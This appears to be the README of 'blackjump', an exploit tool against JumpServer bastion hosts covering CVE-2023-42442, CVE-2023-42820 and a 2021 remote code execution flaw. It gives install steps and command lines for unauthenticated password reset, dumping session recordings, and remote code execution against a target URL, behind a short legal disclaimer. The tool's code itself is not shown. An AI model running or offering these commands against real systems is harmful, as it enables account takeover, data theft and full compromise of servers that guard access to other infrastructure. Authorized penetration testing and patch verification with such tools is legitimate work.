
JumpServer 堡垒机未授权综合漏洞利用, Exploit for CVE-2023-42442 / CVE-2023-42820 / RCE 2021
Legal Disclaimer: This tool is only intended for legally authorized enterprise security construction activities.
When using this tool for testing, you should ensure that the behavior complies with local laws and regulations and has obtained sufficient authorization. Do not use against unauthorized targets.
If you engage in any illegal behavior during the use of this tool, you shall bear the corresponding consequences on your own, and we will not assume any legal or joint liability
JumpServer Fortress Machine Integrated Vulnerability Exploit Tool
python3 -m pip install -r requirements.txt
--user and --email option if you know the username and email in reset password modulepython3 blackjump.py reset https://vulerability

<uuid4>.tar file in the outputs/ directory can be thrown into the jumpserver playerpython3 blackjump.py dump https://vulerability

python3 blackjump.py rce http(s)://vulerability

python3 blackjump.py {reset,dump,rce} -h